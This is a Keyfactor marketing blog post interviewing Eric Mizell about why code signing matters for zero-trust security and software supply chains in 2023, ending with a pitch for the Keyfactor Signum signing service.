As we enter 2023, code signing will be more important than ever – and that’s saying a lot.
In today’s zero-trust environment, code signing represents a critical step in protecting the integrity of software and infrastructure. When done right, code signing ensures only the right people and tools have access to sign code, and that signature enables users and devices to determine which software to trust – and which not to trust.
Of course, like everything in the security world, introducing the right practices around code signing to achieve the desired end state is easier said than done. But getting it right will be an essential priority for 2023 to protect against breaches and supply chain attacks.
So what exactly does the current landscape around code signing look like and what can we expect to change in the year ahead? To answer these questions, we sat down with Eric Mizell, VP of Field Engineering at Keyfactor. Here’s what he had to say.
Keyfactor: In your opinion, what are some of the main reasons code signing has not yet been widely adopted?
Eric Mizell: I believe there are several reasons code signing hasn’t been widely adopted yet, and most of them have to do with varying levels of awareness. Those reasons, starting with the lowest awareness level, include:
- Teams don’t know how to sign code or where code signing fits into their organization.
- Code signing is on the to-do list but lower than other priorities.
- Code signing is happening, but is limited to a specific group and potentially unknown to the larger organization.
Finally, one of the biggest blockers to code signing, regardless of awareness levels, is limited standards and a lack of support and best practices for code signing.
Keyfactor: Despite lagging adoption, why is code signing becoming more important?
Eric: First and foremost, code signing plays a significant role in implementing zero-trust security strategies, which are quickly becoming the standard across organizations. Every company is a software company and the number of applications they build and deploy continues to grow. How can you trust what you build and deploy (zero-trust) if you are not signing?
On top of that, we’re also seeing an increase in insider threats. Specifically, with more and more engineers working from home, many are taking on more jobs and outsourcing code from untrusted individuals. This leads to more insider threats and will require organizations to introduce more checks and balances (one of which should be code signing) in response.
Keyfactor: As awareness around the importance of code signing increases, can we expect to see more standards introduced?
Eric: Absolutely, and GitHub has already started setting the standard. Recently, GitHub launched authentication requirements to verify the person checking in the code. In fact, companies can now enable a capability within GitHub that requires certificate authorization for developers to ensure that the code comes from the designated developer. This is the first step in the software supply chain to ensure code comes from a trusted developer.
Keyfactor: When do you think we’ll reach the tipping point where code signing becomes the norm?
Eric: Fortunately, very soon. Code signing will soon be required for banks, and that’s the first sign that the tipping point is coming, since historically, once high-risk security institutions (like banks) adopt a new security measure, other industries follow closely behind.
That said, we’re still at the beginning of this, as new regulations calling for secure software supply chains are just being introduced in the US. The current mandate applies to vendors who sell to the US government, but this will spread quickly and I expect to see a much different landscape at the end of the year.
Keyfactor: Are there any international standards we can look to as a model?
Eric: So far, the requirements in the US are very similar to those internationally, but many European Union companies are ahead of their US counterparts. As we learn more, we may find tighter regulations originating in the EU.
Keyfactor: What do you think is driving these new requirements for banks?
Eric: Quite simply, we can no longer live by the “trust and verify” approach. We now live in a zero-trust world, and that means we must ensure that all the software, scripts, and binaries we build and deploy are signed in a secure way.
Keyfactor: Does the fact that many banking services are now international complicate their ability to provide this level of security?
Eric: This extends much broader. I think every company has this issue since developers are no longer necessarily working in the same office on a secure network. When developers can be anywhere in the world, how do we verify their identity and confirm that they are actually the ones checking in code? Securing the software supply chain from code check in to signing builds is the right path forward.
Ready to get started with secure code signing in your org?
2023 will no doubt be the year that code signing becomes a top priority for organizations of all kinds. Stay ahead of the curve and start protecting your organization now with Keyfactor Signum, a secure signing-as-a-service platform that makes signing code, containers, software, and firmware effortless for application and operations teams and easy to manage for security teams.